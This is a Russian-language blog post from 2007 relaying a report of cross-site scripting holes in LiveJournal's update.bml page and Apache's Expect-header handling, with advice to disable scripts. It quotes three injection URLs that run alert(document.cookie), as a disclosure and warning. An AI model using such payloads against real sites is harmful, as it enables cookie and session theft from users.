АЛАРМЕ11 ГОЛАКТЕКО ОПАСНОСТЕ!!!1111 XSS-уязвимости в Livejournal.com
Опубликовано 27.12.2007 - В рубриках: livejournal, Блогосфера, News
Как сообщает fuzzing.ru
Обнаружены XSS-уязвимости в сервисе блогов Livejournal.com
* Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого заголовка Expect.
Приложение: Apache до версий 1.3.34/2.0.57/2.2.1
Пример использования: http://www.securityfocus.com/archive/1/433280
* Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация GET-переменной usejournal.
Приложение: /update.bml
Примеры использования:
http://www.livejournal.com:80/update.bml?usejournal=>”>
<script%20%0a%0d>alert(document.cookie)%3B</script>
http://www.livejournal.com:80/update.bml?usejournal=>’>
<script%20%0a%0d>alert(document.cookie)%3B</script>
http://www.livejournal.com/update.bml?usejournal=–>
<script%20%0a%0d>alert(document.cookie)%3B</script>
***
За новость спасибо камраду ![[info]](http://stat.livejournal.com/img/userinfo.gif){kind=small}
ampir
Как назло нет времени потестировать толком. Примеры приведенные выше у меня в Firefox 2.0.0.11 не работают, но всякий случай временно запретил выполнение скриптов для Livejournal.com и до официального объявления о закрытии дыры рекомендую сделать всем пользователям тоЖЖе самое.
Предваряя вопросы: если не особо фантазировать на тему format c: и т.п., то подобная дыра означает ни больше ни меньше, как возможность злоумышленника украсть ваши cookie, что конечно же не есть очень хорошо :)
Разместить у себя на ресурсе или в ЖЖ:
На любом форуме в своем сообщении:
Комментарии
Один отзыв на «АЛАРМЕ11 ГОЛАКТЕКО ОПАСНОСТЕ!!!1111 XSS-уязвимости в Livejournal.com»
Оставьте отзыв
Опа…не зал даже, что такой проект может быть … подвержен натиску такому.